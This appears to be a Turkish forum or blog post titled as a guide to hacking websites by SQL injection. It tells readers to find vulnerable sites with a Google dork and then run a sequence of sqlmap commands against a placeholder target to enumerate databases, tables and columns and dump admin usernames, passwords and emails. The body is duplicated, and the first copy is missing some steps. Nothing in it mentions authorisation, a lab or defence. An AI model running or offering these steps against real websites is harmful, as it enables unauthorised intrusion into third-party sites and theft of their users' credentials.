SQL injeksiyon yöntemi ile Website Hackleme . Video izle
Sqlmap python dili ile yazılmış açık kaynak kodlu,sql injection açığını tespit ve istismar eden bir araçtır. Bu araç sizin belirtmiş olduğunuz girdiler ile hedef site üzerinde kombinasyonları deneyerek açık aramaya çalışır. Kali Linux işletim sistemi üzerinde hazır olarak gelen bu araç, Windows işletim sistemi ve diğer Linux işletim sistemi kullanıcılarına da açıktır. İndirmek için http://sqlmap.org/ adresine gidebilirsiniz.Ancak Kali Linux makinesinde zaten var bunun için indirmeye gerek yok. SQL taramaları bir proğramdan ziyade el ile yapılan manuel ayarlamalar daha iyi sonuç verir. Nitekim videoda olduğu gibi bende manuel tarama yaptım.
Videoyu buradan izliyebilirsiniz
1) Tarayıcımızdan aşağıdaki komutu girerek sql açığı olan siteleri karşımıza çıkarır
2) Daha sonra bulduğumzun sitenin URL'sini kopyalayıp kali linux makinamızdan terminali açıyoruz ve aşağıdaki komutu yazıyoruz
3) Çıkan verilerde eğer databasesi çıkmadıysa bu komutu giriyoruz
sqlmap -u https://www.hedefsite.com/php?id=2" --current-db
4) Aşağıdaki kod ise veritabani_adi adlı veritabanındaki tabloların isimlerini listeler
sqlmap -u https://www.hedefsite.com/php?id=2" -D veritabanı ismi --tables
5) Aşağıdaki kod ise kolonları getirir
sqlmap -u https://www.hedefsite.com/php?id=2" -D veritabanı ismi -T admin --columns
6) Aşağıdaki kod ise kolonlarda yer alan veriler ekrana yansıtılır.
sqlmap -u https://www.hedefsite.com/php?id=2" -D veritabanı ismi -T admin -C admin,password,email --dump
VİDEOYU BURADAN İZLİYEBİLİRSİNİZ
Sqlmap python dili ile yazılmış açık kaynak kodlu,sql injection açığını tespit ve istismar eden bir araçtır. Bu araç sizin belirtmiş olduğunuz girdiler ile hedef site üzerinde kombinasyonları deneyerek açık aramaya çalışır. Kali Linux işletim sistemi üzerinde hazır olarak gelen bu araç, Windows işletim sistemi ve diğer Linux işletim sistemi kullanıcılarına da açıktır. İndirmek için http://sqlmap.org/ adresine gidebilirsiniz.Ancak Kali Linux makinesinde zaten var bunun için indirmeye gerek yok. SQL taramaları bir proğramdan ziyade el ile yapılan manuel ayarlamalar daha iyi sonuç verir. Nitekim videoda olduğu gibi bende manuel tarama yaptım.
Videoyu buradan izliyebilirsiniz
1) Tarayıcımızdan aşağıdaki komutu girerek sql açığı olan siteleri karşımıza çıkarır
inurl='php id= 2'
2) Daha sonra bulduğumzun sitenin URL'sini kopyalayıp kali linux makinamızdan terminali açıyoruz ve aşağıdaki komutu yazıyoruz
sqlmap -u https://www.hedefsite.com/php?id=2" --dbs
3) Çıkan verilerde eğer databasesi çıkmadıysa bu komutu giriyoruz
sqlmap -u https://www.hedefsite.com/php?id=2" --current-db
4) Aşağıdaki kod ise veritabani_adi adlı veritabanındaki tabloların isimlerini listeler
sqlmap -u https://www.hedefsite.com/php?id=2" -D veritabanı ismi --tables
5) Aşağıdaki kod ise kolonları getirir
sqlmap -u https://www.hedefsite.com/php?id=2" -D veritabanı ismi -T admin --columns
6) Aşağıdaki kod ise kolonlarda yer alan veriler ekrana yansıtılır.
sqlmap -u https://www.hedefsite.com/php?id=2" -D veritabanı ismi -T admin -C admin,password,email --dump
VİDEOYU BURADAN İZLİYEBİLİRSİNİZ
Son düzenleme: